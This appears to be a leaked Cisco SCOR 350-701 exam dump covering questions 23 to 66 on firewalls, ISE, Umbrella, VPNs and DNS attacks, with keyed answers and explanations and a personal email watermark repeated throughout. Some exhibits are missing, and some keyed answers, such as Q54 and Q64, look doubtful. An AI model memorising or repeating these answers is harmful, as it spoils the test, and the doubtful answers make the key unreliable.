An engineer has been tasked with configuring a Cisco FTD to analyze protocol fields and detect anomalies
in the traffic from industrial systems. What must be done to meet these requirements?

A. Implement pre-filter policies for the CIP preprocessor


B. Enable traffic analysis in the Cisco FTD
C. Configure intrusion rules for the DNP3 preprocessor
D. Modify the access control policy to trust the industrial traffic

Answer: A

Explanation

The Modbus, DNP3, and CIP SCADA preprocessors detect traffic anomalies and provide data to intrusion
rules. Therefore in this question only answer A or answer C is correct.

The DNP3 preprocessor detects anomalies in DNP3 traffic and decodes the DNP3 protocol for processing by
the rules engine, which uses DNP3 keywords to access certain protocol fields.

The Common Industrial Protocol (CIP) is a widely used application protocol that supports industrial
automation applications. EtherNet/IP is an implementation of CIP that is used on Ethernet-based
networks.The CIP preprocessor detects CIP and ENIP traffic running on TCP or UDP and sends it to the
intrusion rules engine. You can use CIP and ENIP keywords in custom intrusion rules to detect attacks in
CIP and ENIP traffic.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/630/configuration/guide/fpmc-
config-guide-v63/scada_preprocessors.html

Both DNP3 and CIP preprocessors can be used to detect traffic anomalies but we choose CIP as it is widely
used in industrial applications.

Note:
+ An intrusion rule is a specified set of keywords and arguments that the system uses to detect attempts
to exploit vulnerabilities in your network. As the system analyzes network traffic, it compares packets
against the conditions specified in each rule, and triggers the rule if the data packet meets all the
conditions specified in the rule.
+ Preprocessor rules, which are rules associated with preprocessors and packet decoder detection options
in the network analysis policy. Most preprocessor rules are disabled by default.

Question 24

Which posture assessment requirement provides options to the client for remediation and requires the
remediation within a certain timeframe?

A. Audit
B. Mandatory
willsonliam55@gmail.com Skype Apple Kid

C. Optional
D. Visibility

Answer: B

Explanation

A posture requirement is a set of compound conditions with an associated remediation action that can be
linked with a role and an operating system. All the clients connecting to your network must meet
mandatory requirements during posture evaluation to become compliant on the network.

Posture-policy requirements can be set to mandatory, optional, or audit types in posture policies. If
requirements are optional and clients fail these requirements, then the clients have an option to continue
during posture evaluation of endpoints.

Mandatory Requirements

During policy evaluation, the agent provides remediation options to clients who fail to meet the mandatory
requirements defined in the posture policy. End users must remediate to meet the requirements within the
time specified in the remediation timer settings.

For example, you have specified a mandatory requirement with a user-defined condition to check the
existence of C:\temp\text.file in the absolute path. If the file does not exist, the mandatory requirement
fails and the user will be moved to Non-Compliant state.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/1-
4/admin_guide/b_ise_admin_guide_14/b_ise_admin_guide_14_chapter_010111.html

Question 25

Which attribute has the ability to change during the RADIUS CoA?

A. NTP
B. authorization
C. accessibility
D. membership

Answer: B

Explanation

The RADIUS Change of Authorization (CoA) feature provides a mechanism to change the attributes of an
authentication, authorization, and accounting (AAA) session after it is authenticated.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/15-sy/sec-usr-
aaa-15-sy-book/sec-rad-coa.html

Question 26

With Cisco AMP for Endpoints, which option shows a list of all files that have been executed in your
environment?

A. prevalence
B. file analysis
C. detections
D. vulnerable software
E. threat root cause

Answer: A

Explanation

Prevalence allows you to view files that have been executed in your deployment.

Note: Threat Root Cause shows how malware is getting onto your computers.
willsonliam55@gmail.com Skype Apple Kid

Reference: https://docs.amp.cisco.com/en/A4E/AMP%20for%20Endpoints%20User%20Guide.pdf

Question 27

A company discovered an attack propagating through their network via a file. A custom file policy was
created in order to track this in the future and ensure no other endpoints execute the infected file. In
addition, it was discovered during testing that the scans are not detecting the file as an indicator of
compromise. What must be done in order to ensure that the created is functioning as it should?

A. Create an IP block list for the website from which the file was downloaded
B. Block the application that the file was using to open
C. Upload the hash for the file into the policy
D. Send the file to Cisco Threat Grid for dynamic analysis

Answer: C

Question 28

A network engineer is trying to figure out whether FlexVPN or DMVPN would fit better in their
environment. They have a requirement for more stringent security multiple security associations for the
connections, more efficient VPN establishment as well consuming less bandwidth. Which solution would be
best for this and why?

A. DMVPN because it supports IKEv2 and FlexVPN does not.


B. FlexVPN because it supports IKEv2 and DMVPN does not.
C. FlexVPN because it uses multiple SAs and DMVPN does not.
D. DMVPN because it uses multiple SAs and FlexVPN does not.

Answer: C

Explanation

FlexVPN supports IKEv2 -> Answer A is not correct.


DMVPN supports both IKEv1 & IKEv2 -> Answer B is not correct.
FlexVPN support multiple SAs -> Answer D is not correct.

Therefore answer C is the best choice left.

Question 29

How does Cisco Workload Optimization Manager help mitigate application performance issues?

A. It deploys an AWS Lambda system


B. It automates resource resizing
C. It optimizes a flow path
D. It sets up a workload forensic score

Answer: B

Explanation

Cisco Workload Optimization Manager provides specific real-time actions that ensure workloads get the
resources they need when they need them, enabling continuous placement, resizing, and capacity
decisions that can be automated, driving continuous health in the environment. You can automate the
software’s decisions according to your level of comfort: recommend (view only), manual (select and
apply), or automated (executed in real time by software).

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/data-center-virtualization/one-
enterprise-suite/solution-overview-c22-739078.pdf

Question 30

An organization configures Cisco Umbrella to be used for its DNS services. The organization must be able
to block traffic based on the subnet that the endpoint is on but it sees only the requests from its public IP
address instead of each internal IP address. What must be done to resolve this issue?
willsonliam55@gmail.com Skype Apple Kid

A. Set up a Cisco Umbrella virtual appliance to internally field the requests and see the traffic of each IP
address
B. Use the tenant control features to identify each subnet being used and track the connections within the
Cisco Umbrella dashboard
C. Install the Microsoft Active Directory Connector to give IP address information stitched to the requests
in the Cisco Umbrella dashboard
D. Configure an internal domain within Cisco Umbrella to help identify each address and create policy from
the domains

Answer: A

Explanation

Umbrella virtual appliances (VAs) are lightweight virtual machines that are compatible with VMWare
ESX/ESXi, Windows Hyper-V, and KVM hypervisors and the Microsoft Azure, Google Cloud Platform, and
Amazon Web Services cloud platforms. When utilized as conditional DNS forwarders on your network,
Umbrella VAs record the internal IP address information of DNS requests for usage in reports, security
enforcement, and category filtering policies.

VAs act as conditional DNS forwarders in your network, intelligently forwarding public DNS queries to Cisco
Umbrella’s global network, and local DNS queries to your existing local DNS servers and forwarders. Every
public DNS query sent to Umbrella is encrypted, authenticated, and includes the client’s internal IP
address.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/1-introduction

If you’re already pointing DNS to Umbrella, or plan to, all the DNS traffic visible in your Umbrella reports
come from a single Network identity. The VAs provide internal IP visibility, allowing you to track down
malicious or inappropriate traffic within your network to a specific IP address.

Without Virtual Appliances


Security and DNS traffic-related investigations cannot be traced back to an individual computer or IP
address.
willsonliam55@gmail.com Skype Apple Kid

With Virtual Appliances


VAs record the internal IP address of every DNS request. Security and DNS traffic-related investigations
allow you to associate traffic to an individual, internal IP address.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/1-introduction

Question 31

What is a difference between a DoS attack and a DDoS attack?

A. A DoS attack is where a computer is used to flood a server with TCP and UDP packets whereas a DDoS
attack is where multiple systems target a single system with a DoS attack.
B. A DoS attack is where a computer is used to flood a server with TCP and UDP packets whereas a DDoS
attack is where a computer is used to flood multiple servers that are distributed over a LAN
C. A DoS attack is where a computer is used to flood a server with UDP packets whereas a DDoS attack is
where a computer is used to flood a server with TCP packets
D. A DoS attack is where a computer is used to flood a server with TCP packets whereas a DDoS attack is
where a computer is used to flood a server with UDP packets

Answer: A

Question 32

Which two capabilities of Integration APIs are utilized with Cisco DNA center? (Choose two)

A. Automatically deploy new virtual routers


B. Upgrade software on switches and routers
C. Application monitors for power utilization of devices and IoT sensors
D. Connect to Information Technology Service Management Platforms
E. Create new SSIDs on a wireless LAN controller

Answer: C D

Explanation

Integration API (Westbound)


Integration capabilities are part of Westbound interfaces. To meet the need to scale and accelerate
operations in modern data centers, IT operators require intelligent, end-to-end work flows built with open
APIs. The Cisco DNA Center platform provides mechanisms for integrating Cisco DNA Assurance workflows
and data with third-party IT Service Management (ITSM) solutions.

Reference: https://developer.cisco.com/docs/dna-center/#!cisco-dna-center-platform-overview/events-
and-notifications-eastbound

-> Therefore answer D is correct.

Westbound—Integration APIs
Cisco DNA Center platform can power end-to-end IT processes across the value chain by integrating
various domains such as ITSM, IPAM, and reporting. By leveraging the REST-based Integration Adapter
APIs, bi-directional interfaces can be built to allow the exchange of contextual information between Cisco
DNA Center and the external, third-party IT systems. The westbound APIs provide the capability to publish
the network data, events and notifications to the external systems and consume information in Cisco DNA
Center from the connected systems.

Reference: https://blogs.cisco.com/networking/with-apis-cisco-dna-center-can-improve-your-competitive-
advantage
willsonliam55@gmail.com Skype Apple Kid

Therefore the most suitable choice is Integration APIs can monitor for power utilization of devices and IoT
sensors -> Answer C is correct.

Question 33

Which kind of API that is used with Cisco DNA Center provisions SSIDs, QoS policies, and update software
versions on switches?

A. integration
B. intent
C. event
D. multivendor

Answer: B

Explanation

Northbound-Intent APIs

Intent APIs enable developers to access Cisco DNA Center Automation and Assurance workflows. Through
this access, you can simplify the process of creating workflows that consolidate multiple network actions.

Say, for instance, you’re configuring an SSID on a wireless network. Using Cisco DNA Center and the
intent APIs, you can offload the process of setting WLAN and security settings. This saves time and
provides greater consistency. You can do the same for QoS policies, software images running on the
network devices, and application health.

Reference: https://www.publicnow.com/view/3057F243685FA76A88EFC1651CAAFD66B5B849FE?1603802
892

Question 34

What is the purpose of CA in a PKI?

A. to issue and revoke digital certificates.


B. to validate the authenticity of a digital certificate
C. to create the private key for a digital certificate.
D. to certify the ownership of a public key by the named subject

Answer: A

Explanation

A trusted CA is the only entity that can issue trusted digital certificates. This is extremely important
because while PKI manages more of the encryption side of these certificates, authentication is vital to
understanding which entities own what keys. Without a trusted CA, anyone can issue their own keys,
authentication goes out the window and chaos ensues.

Reference: https://cheapsslsecurity.com/blog/understanding-the-role-of-certificate-authorities-in-pki/

Question 35

Which DevSecOps implementation process gives a weekly or daily update instead of monthly or quarterly
in the applications?

A. orchestration
B. CI/CD pipeline
C. container
D. security

Answer: B

Explanation
willsonliam55@gmail.com Skype Apple Kid

Unlike the traditional software life cycle, the CI/CD implementation process gives a weekly or daily update
instead of monthly or quarterly. The fun part is customers won’t even realize the update is in their
applications, as they happen on the fly.

Reference: https://devops.com/how-to-implement-an-effective-ci-cd-pipeline/

Question 36

Which parameter is required when configuring a Netflow exporter on a Cisco Router?

A. DSCP value
B. source interface
C. exporter name
D. exporter description

Answer: C

Explanation

An example of configuring a NetFlow exporter is shown below:

flow exporter Exporter


destination 192.168.100.22
transport udp 2055
!

Question 37

Which category includes Dos Attacks?

A. virus attacks
B. trojan attacks
C. flood attacks
D. phishing attacks

Answer: C

Question 38

What are two advantages of using Cisco Any connect over DMVPN? (Choose two)

A. It provides spoke-to-spoke communications without traversing the hub


B. It allows different routing protocols to work over the tunnel
C. It allows customization of access policies based on user identity
D. It allows multiple sites to connect to the data center
E. It enables VPN access for individual users from their machines

Answer: C E

Question 39

When choosing an algorithm to us, what should be considered about Diffie Hellman and RSA for key
establishment?

A. RSA is an asymmetric key establishment algorithm intended to output symmetric keys.


B. RSA is a symmetric key establishment algorithm intended to output asymmetric keys.
C. DH is a symmetric key establishment algorithm intended to output asymmetric keys.
D. DH is on asymmetric key establishment algorithm intended to output symmetric keys.

Answer: D

Explanation
willsonliam55@gmail.com Skype Apple Kid

Diffie Hellman (DH) uses a private-public key pair to establish a shared secret, typically a symmetric key.
DH is not a symmetric algorithm – it is an asymmetric algorithm used to establish a shared secret for a
symmetric key algorithm.

Question 40

Which type of DNS abuse exchanges data between two computers even when there is no direct
connection?

A. malware installation
B. command-and-control communication
C. network footprinting
D. data exfiltration

Answer: D

Explanation

Malware installation: This may be done by hijacking DNS queries and responding with malicious IP
addresses.

Command & Control communication: As part of lateral movement, after an initial compromise, DNS
communications is abused to communicate with a C2 server. This typically involves making periodic DNS
queries from a computer in the target network for a domain controlled by the adversary. The responses
contain encoded messages that may be used to perform unauthorized actions in the target network.

Network footprinting: Adversaries use DNS queries to build a map of the network. Attackers live off the
terrain so developing a map is important to them.

Data theft (exfiltration): Abuse of DNS to transfer data; this may be performed by tunneling other
protocols like FTP, SSH through DNS queries and responses. Attackers make multiple DNS queries from a
compromised computer to a domain owned by the adversary. DNS tunneling can also be used for
executing commands and transferring malware into the target network.

Reference: https://www.netsurion.com/articles/5-types-of-dns-attacks-and-how-to-detect-them

Question 41

What is a difference between GETVPN and IPsec?

A. GETVPN reduces latency and provides encryption over MPLS without the use of a central hub
B. GETVPN provides key management and security association management
C. GETVPN is based on IKEv2 and does not support IKEv1
D. GETVPN is used to build a VPN network with multiple sites without having to statically configure all
devices

Answer: A

Explanation

By using GETVPN together with DMVPN, the delay caused by IPsec tunnel negotiation is eliminated
because connections are static.

Reference: Network Security Technologies and Solutions (CCIE Professional Development) Book

Moreover, GETVPN is a site-to-site VPN so it does not require a central hub.

Question 42

What is a benefit of using telemetry over SNMP to configure new routers for monitoring purposes?

A. Telemetry uses a pull, method which makes it more reliable than SNMP
B. Telemetry uses push and pull, which makes it more scalable than SNMP
C. Telemetry uses push and pull which makes it more secure than SNMP
D. Telemetry uses a push method which makes it faster than SNMP
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

SNMP polling can often be in the order of 5-10 minutes, CLIs are unstructured and prone to change which
can often break scripts.
The traditional use of the pull model, where the client requests data from the network does not scale when
what you want is near real-time data.
Moreover, in some use cases, there is the need to be notified only when some data changes, like
interfaces status, protocol neighbors change etc.
Model-Driven Telemetry is a new approach for network monitoring in which data is streamed from network
devices continuously using a push model and provides near real-time access to operational statistics.

Referfence: https://developer.cisco.com/docs/ios-xe/#!streaming-telemetry-quick-start-guide/streaming-
telemetry

Question 43

An organization wants to use Cisco FTD or Cisco ASA devices. Specific URLs must be blocked from being
accessed via the firewall which requires that the administrator input the bad URL categories that the
organization wants blocked into the access policy. Which solution should be used to meet this
requirement?

A. Cisco ASA because it enables URL filtering and blocks malicious URLs by default, whereas Cisco FTD
does not
B. Cisco ASA because it includes URL filtering in the access control policy capabilities, whereas Cisco FTD
does not
C. Cisco FTD because it includes URL filtering in the access control policy capabilities, whereas Cisco ASA
does not
D. Cisco FTD because it enables URL filtering and blocks malicious URLs by default, whereas Cisco ASA
does not

Answer: C

Question 44

An administrator configures a Cisco WSA to receive redirected traffic over ports 80 and 443. The
organization requires that a network device with specific WSA integration capabilities be configured to
send the traffic to the WSA to proxy the requests and increase visibility, while making this invisible to the
users. What must be done on the Cisco WSA to support these requirements?

A. Configure transparent traffic redirection using WCCP in the Cisco WSA and on the network device
B. Configure active traffic redirection using WPAD in the Cisco WSA and on the network device
C. Use the Layer 4 setting in the Cisco WSA to receive explicit forward requests from the network device
D. Use PAC keys to allow only the required network devices to send the traffic to the Cisco WSA

Answer: A

Question 45

An administrator configures new authorization policies within Cisco ISE and has difficulty profiling the
devices. Attributes for the new Cisco IP phones that are profiled based on the RADIUS authentication are
seen however the attributes for CDP or DHCP are not. What should the administrator do to address this
issue?

A. Configure the ip dhcp snooping trust command on the DHCP interfaces to get the information to
Cisco ISE
B. Configure the authentication port-control auto feature within Cisco ISE to identify the devices that are
trying to connect
C. Configure a service template within the switch to standardize the port configurations so that the correct
information is sent to Cisco ISE
D. Configure the device sensor feature within the switch to send the appropriate protocol information
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

Device sensor is a feature of access devices. It allows to collect information about connected endpoints.
Mostly, information collected by Device Sensor can come from the following protocols:
+ Cisco Discovery Protocol (CDP)
+ Link Layer Discovery Protocol (LLDP)
+ Dynamic Host Configuration Protocol (DHCP)

Reference: https://www.cisco.com/c/en/us/support/docs/security/identity-services-engine/200292-
Configure-Device-Sensor-for-ISE-Profilin.html

Question 46

A network engineer must monitor user and device behavior within the on-premises network. This data
must be sent to the Cisco Stealthwatch Cloud analytics platform for analysis. What must be done to meet
this requirement using the Ubuntu-based VM appliance deployed in a VMware-based hypervisor?

A. Configure a Cisco FMC to send syslogs to Cisco Stealthwatch Cloud


B. Deploy the Cisco Stealthwatch Cloud PNM sensor that sends data to Cisco Stealthwatch Cloud
C. Deploy a Cisco FTD sensor to send network events to Cisco Stealthwatch Cloud
D. Configure a Cisco FMC to send NetFlow to Cisco Stealthwatch Cloud

Answer: B

Explanation

The Stealthwatch Cloud Private Network Monitoring (PNM) Sensor is an extremely flexible piece of
technology, capable of being utilized in a number of different deployment scenarios. It can be deployed as
a complete Ubuntu based virtual appliance on different hypervisors (e.g. –VMware, VirtualBox). It can be
deployed on hardware running a number of different Linux-based operating systems.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2019/pdf/5eU6DfQV/LTRSEC-2240-
LG2.pdf

Question 47

An organization uses Cisco FMC to centrally manage multiple Cisco FTD devices. The default management
port conflicts with other communications on the network and must be changed. What must be done to
ensure that all devices can communicate together?

A. Manually change the management port on Cisco FMC and all managed Cisco FTD devices
B. Set the tunnel to go through the Cisco FTD
C. Change the management port on Cisco FMC so that it pushes the change to all managed Cisco FTD
devices
D. Set the tunnel port to 8305

Answer: A

Explanation

The FMC and managed devices communicate using a two-way, SSL-encrypted communication channel,
which by default is on port 8305.

Cisco strongly recommends that you keep the default settings for the remote management port, but if the
management port conflicts with other communications on your network, you can choose a different port. If
you change the management port, you must change it for all devices in your deployment that need to
communicate with each other.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/misc/fmc-ftd-mgmt-nw/fmc-ftd-
mgmt-nw.html

Question 48
willsonliam55@gmail.com Skype Apple Kid

Which service allows a user export application usage and performance statistics with Cisco Application
Visibility and control?

A. SNORT
B. NetFlow
C. SNMP
D. 802.1X

Answer: B

Explanation

Application Visibility and control (AVC) supports NetFlow to export application usage and performance
statistics. This data can be used for analytics, billing, and security policies.

Question 49

An engineer adds a custom detection policy to a Cisco AMP deployment and encounters issues with the
configuration. The simple detection mechanism is configured, but the dashboard indicates that the hash is
not 64 characters and is non-zero. What is the issue?

A. The engineer is attempting to upload a hash created using MD5 instead of SHA-256
B. The file being uploaded is incompatible with simple detections and must use advanced detections
C. The hash being uploaded is part of a set in an incorrect format
D. The engineer is attempting to upload a file instead of a hash

Answer: A

Question 50

Drag and drop the cloud security assessment components from the left onto the definitions on the right.

Answer:

cloud data protection assessment: understand the security posture of the data or activity taking place
in public cloud deployments
cloud security strategy workshop: develop a cloud security strategy and roadmap aligned to business
priorities
cloud security architecture assessment: identify strengths and areas for improvement in the current
security architecture during onboarding
user entity behavior assessment: detect potential anomalies in user behavior that suggest malicious
behavior in a Software-as-a-Service application

Explanation

Cloud Data Protection Assessment: We review the security posture of documents stored in one Software-
as-a-Service (SaaS) instance, or review the activity taking place in an Infrastructure-as-a-Service (IaaS)
deployment over a period of time.
willsonliam55@gmail.com Skype Apple Kid

Cloud Data Architecture Assessment: We conduct whiteboarding sessions, interviews, and documentation
reviews to assess the security architecture of your cloud environment

Cloud User Entity Behavior Assessment: We examine how the users provisioned in a SaaS instance
behave, establishes a baseline for each individual user, and monitor user activity

Cloud Security Strategy: Our experts educate your team on cloud security as related to current and future
states, as well as business priorities

Reference: https://www.cisco.com/c/dam/en/us/products/security/security-strategy-advisory-aag.pdf

Question 51

Refer to the exhibit.

What does this python script accomplish?

A. It lists the LDAP users from the external identity store configured on Cisco ISE
B. It authenticates to a Cisco ISE server using the username of ersad
C. It allows authentication with TLSv1 SSL protocol
D. It authenticates to a Cisco ISE with an SSH connection

Answer: A

Explanation

In this question the username of “ersad” is just an example and it is in the comment section (which is
started by a #) so it has no effect on the script. In fact the username will be taken from the second
willsonliam55@gmail.com Skype Apple Kid

argument of the command. For example, suppose the file name of the above script is “Internal_user.py”
then if we call the script with the command:

python Internal_user.py 192.168.1.10 digitaltut


digitaltutPassWord!

Then the username would be “digitaltut”.

-> Answer B is not correct.

From the line “conn = http.client.HTTPSConnection(“{}:9060″.format(host),


context=ssl.SSLContext(ssl.PROTOCOL_TLSv1_2))”, we specify we are using TLS version 1.2 as the
channel encryption protocol (not TLSv1) -> Answer C is not correct.

Also from the line above, we are using HTTPS to make a request. It is different from a SSH connection so
answer D is not correct.

-> Therefore only answer A is left.

Note: The purpose of this Python script is used to get the guest users through ISE External RESTful
Services (ERS) API. ERS is designed to allow external clients to perform CRUD (Create, Read, Update,
Delete) operations on Cisco ISE resources.

Question 52

Refer to the exhibit.

ntp authentication-key 10 md5 cisco123


ntp trusted-key 10

A network engineer is testing NTP authentication and realizes that any device synchronizes time with this
router and that NTP authentication is not enforced. What is the cause of this issue?

A. The hashing algorithm that was used was MD5 which is unsupported.
B. The key was configured in plain text.
C. NTP authentication is not enabled.
D. The router was not rebooted after the NTP configuration updated

Answer: C

Explanation

In order to enable NTP, we need an additional command “ntp authenticate”.

Question 53

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

How does Cisco Umbrella manage traffic that is directed toward risky domains?

A. Traffic is managed by the application settings, unhandled and allowed


B. Traffic is allowed but logged
C. Traffic is managed by the security settings and blocked
D. Traffic is proxied through the intelligent proxy

Answer: C

Explanation

The ‘greylist’ of risky domains is compromised of domains that host both malicious and safe content—we
consider these “risky” domains. These sites often allow users to upload and share content—making them
difficult to police, even for the admins of the site.

Reference: https://docs.umbrella.com/deployment-msp/docs/what-is-the-intelligent-proxy

In order to enable intelligent proxy, we need to use “Advanced Settings”:


willsonliam55@gmail.com Skype Apple Kid

But in this question the “Advanced Settings” (located at the bottom of the figure) was not used -> Answer
D is not correct.

Application Settings organize applications into categories based on the type of processes or services
provided; for example, shopping, education, or human resources -> It can only manage applications and it
cannot filter domains -> Answer A is not correct.

In the “Security Setting” there is a category named “Potentially Harmful Domains” and we can considered
them “risky domains”. This category is disabled by default. The exhibit in this question is not clear so if we
don’t see this category is enabled under Security Setting, we can deduce traffic to “Potentially Harmful
Domains” is allowed.

Note:

+ The security settings categories are, at a minimum, the ones listed below:
willsonliam55@gmail.com Skype Apple Kid

+ “Potentially Harmful Domains” are domains that exhibit suspicious behavior and may be part of an
attack. This category has a higher risk of unwanted detections.

Question 54

An administrator is adding a new Cisco ISE node to an existing deployment. What must be done to ensure
that the addition of the node will be successful when inputting the FQDN?

A. Change the IP address of the new Cisco ISE node to the same network as the others
B. Make the new Cisco ISE node a secondary PAN before registering it with the primary
willsonliam55@gmail.com Skype Apple Kid

C. Open port 8905 on the firewall between the Cisco ISE nodes
D. Add the DNS entry for the new Cisco ISE node into the DNS server

Answer: B

Question 55

Refer to the exhibit.

crypto ikev2 name-mangler MANGLER


dn organization-unit

An engineer is implementing a certificate based VPN. What is the result of the existing configuration?

A. The OU of the IKEv2 peer certificate is used as the identity when matching an IKEv2 authorization
policy
B. Only an IKEv2 peer that has an OU certificate attribute set to MANGLER establishes an IKEv2 SA
successfully
C. The OU of the IKEv2 peer certificate is encrypted when the OU is set to MANGLER
D. The OU of the IKEv2 peer certificate is set to MANGLER

Answer: A

Question 56

An organization wants to implement a cloud-delivered and SaaS-based solution to provide visibility and
threat detection across the AWS network. The solution must be deployed without software agents and rely
on AWS VPC flow logs instead. Which solution meets these requirements?

A. Cisco Stealthwatch Cloud


B. Cisco Umbrella
C. NetFlow collectors
D. Cisco Cloudlock

Answer: A

Question 57

How is data sent out to the attacker during a DNS tunneling attack?

A. as part of the UDP’53 packet payload


B. as part of the domain name
C. as part of the TCP/53 packet header
D. as part of the DNS response packet

Answer: B

Question 58

A network engineer must configure a Cisco ESA to prompt users to enter two forms of information before
gaining access. The Cisco ESA must also join a cluster machine using preshared keys. What must be
configured to meet these requirements?

A. Enable two-factor authentication through a RADIUS server and then join the cluster by using the Cisco
ESA CLI
B. Enable two-factor authentication through a RADIUS server and then join the cluster by using the Cisco
ESA GUI
C. Enable two-factor authentication through a TACACS+ server and then join the cluster by using the Cisco
ESA GUI
D. Enable two-factor authentication through a TACACS+ server and then join the cluster by using the
Cisco ESA CLI
willsonliam55@gmail.com Skype Apple Kid

Answer: A

Explanation

You cannot create or join a cluster from the Graphical User Interface (GUI). You must use the Command
Line Interface (CLI) to create, join, or configure clusters of machines. Once you have created a cluster,
you can change configuration settings from either the GUI or the CLI.

Reference: https://www.cisco.com/c/en/us/td/docs/security/esa/esa11-
0/user_guide_fs/b_ESA_Admin_Guide_11_0/b_ESA_Admin_Guide_chapter_0100111.html

Cisco ESA does not support TACACS+ server.

Question 59

What is the term for having information about threats and threat actors that helps mitigate harmful events
that would otherwise compromise networks or systems?

A. trusted automated exchange


B. Indicators of Compromise
C. The Exploit Database
D. threat intelligence

Answer: D

Explanation

Threat intelligence is referred to as the knowledge about an existing or emerging threat to assets,
including networks and systems. Threat intelligence includes context, mechanisms, indicators of
compromise (IoCs), implications, and actionable advice. Threat intelligence is referred to as the
information about the observables, IoCs intent, and capabilities of internal and external threat actors and
their attacks.

Reference: CCNP and CCIE Security Core SCOR 350-701 Official Cert Guide.

Question 60

Which Cisco platform processes behavior baselines, monitors for deviations, and reviews for malicious
processes in data center traffic and servers while performing software vulnerability detection?

A. Cisco Tetration
B. Cisco ISE
C. Cisco AMP for Network
D. Cisco AnyConnect

Answer: A

Explanation

What use cases are supported by the Cisco Secure Workload platform (formerly Tetration)?
A. The platform supports the following use cases:

+ Process behavior baseline and deviation: Collect the complete process inventory along with the process
hash information, baseline the behavior, and identify deviations.
+ Software inventory and vulnerability detection: Identify all the software packages and versions installed
on the servers. Using the Common Vulnerabilities and Exposures (CVE) database and additional data
feeds, detect if there are any associated vulnerabilities or exposures and take action to protect against
active exploit.

Reference: https://www.cisco.com/c/en/us/products/collateral/data-center-analytics/tetration-analytics/q-
and-a-c67-737402.html

Question 61

Which portion of the network do EPP solutions solely focus on and EDR solutions do not?
willsonliam55@gmail.com Skype Apple Kid

A. server farm
B. perimeter
C. core
D. East-West gateways

Answer: B

Question 62

What is a benefit of using Cisco CWS compared to an on-premises Cisco WSA?

A. Cisco CWS eliminates the need to backhaul traffic through headquarters for remote workers whereas
Cisco WSA does not
B. Cisco CWS minimizes the load on the internal network and security infrastructure as compared to Cisco
WSA.
C. URL categories are updated more frequently on Cisco CWS than they are on Cisco WSA
D. Content scanning for SAAS cloud applications is available through Cisco CWS and not available through
Cisco WSA

Answer: A

Explanation

Malware can enter the Cisco network when an infected user PC connects over a direct link in the office or a
VPN link from a remote location. For these connections, Cisco IT uses the Cisco Web Security Appliance
(WSA) to protect the network from malware intrusion. However, WSA protection is not available when a
user connects to the Internet directly, without connecting via the Cisco network, such as when using a
public Wi-Fi service in a coffee shop. In this case, the user’s PC can become infected with malware, which
may disrupt the user’s activity, spread to other networks and devices, and present the risk of a data
security or privacy breach. Cisco IT uses the Cisco Cloud Web Security (CWS) solution to help protect user
PCs from these malware infections.

The Cisco CWS solution, previously known as Cisco Scan Safe, enforces secure communication to and from
the Internet. It uses the Cisco AnyConnect Secure Mobility Client 3.0 to provide remote workers the same
level of security as onsite employees when using a laptop issued by Cisco.

Reference: https://www.cisco.com/c/dam/en_us/about/ciscoitatwork/borderless_networks/docs/Cloud_We
b_Security_IT_Methods.pdf

Cisco ISR with Cloud Web Security Connector:


Eliminates the need to backhaul Internet traffic from branch offices, so offices can access the
web directly, without losing control of or visibility into web usage.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/router-security/data_sheet_c78-
655324.pdf

Question 63

An organization wants to improve its cybersecurity processes and to add intelligence to its data. The
organization wants to utilize the most current intelligence data for URL filtering, reputations, and
vulnerability information that can be integrated with the Cisco FTD and Cisco WSA. What must be done to
accomplish these objectives?

A. Create a Cisco pxGrid connection to NIST to import this information into the security products for policy
use
B. Create an automated download of the Internet Storm Center intelligence feed into the Cisco FTD and
Cisco WSA databases to tie to the dynamic access control policies.
C. Download the threat intelligence feed from the IETF and import it into the Cisco FTD and Cisco WSA
databases
D. Configure the integrations with Talos Intelligence to take advantage of the threat intelligence that it
provides
willsonliam55@gmail.com Skype Apple Kid

Answer: D

Explanation

We need an automated solution to deal with the rapid change of cybersecurity so answer A and C are not
correct.

According to the following facts about Talos, we believe answer D is the best choice:

Cisco WSA detects and correlates threats in real time by tapping into the largest threat-detection network
in the world, Cisco Talos. To discover where threats are hiding, Cisco Talos pulls massive quantities of
information across multiple vectors – firewall, IPS, web, email, and VPN. Cisco Talos constantly refreshes
information every 3 to 5 minutes – adding intelligence to and receiving intelligence from Cisco WSA and
other network security devices. This enables Cisco WSA to deliver industry-leading defense hours and even
days ahead of competitors.

Reference: https://www.cisco.com/c/en/us/products/collateral/security/web-security-appliance/solution-
overview-c22-732948.html

Talos’ threat intelligence supports a two-way flow of telemetry and protection across market-leading
security solutions including Next-Generation Intrusion Prevention System (NGIPS), Next-Generation
Firewall (NGFW), Advanced Malware Protection (AMP), Email Security Appliance (ESA), Cloud Email
Security (CES), Cloud Web Security (CWS), Web Security Appliance (WSA), Umbrella, and ThreatGrid, as
well as numerous open-source and commercial threat protection systems.

Reference: https://www.talosintelligence.com/docs/Talos_WhitePaper.pdf

Question 64

Cisco SensorBase gathers threat information from a variety of Cisco products and services and performs
analytics to find patterns on threats. Which term describes this process?

A. deployment
B. consumption
C. authoring
D. sharing

Answer: A

Question 65

An organization has a requirement to collect full metadata information about the traffic going through their
AWS cloud services. They want to use this information for behavior analytics and statistics. Which two
actions must be taken to implement this requirement? (Choose two)

A. Configure Cisco ACI to ingest AWS information


B. Configure Cisco Thousand Eyes to ingest AWS information
C. Send syslog from AWS to Cisco Stealthwatch Cloud
D. Send VPC Flow Logs to Cisco Stealthwatch Cloud
E. Configure Cisco Stealthwatch Cloud to ingest AWS information

Answer: D E

Question 66

Refer to the exhibit.


willsonliam55@gmail.com Skype Apple Kid

What will occur when this device tries to connect to the port?

A. 802.1X will not work, but MAB will start and allow the device on the network
B. 802.1X will not work and the device will not be allowed network access
C. 802.1X will work and the device will be allowed on the network
D. 802.1X and MAB will both be used and ISE can use policy to determine the access level

Answer: C

Explanation

In this question we don’t see “mab” command so MAC Authentication Bypass (MAB) is not enabled on the
interface -> Answer A and answer D are not correct.

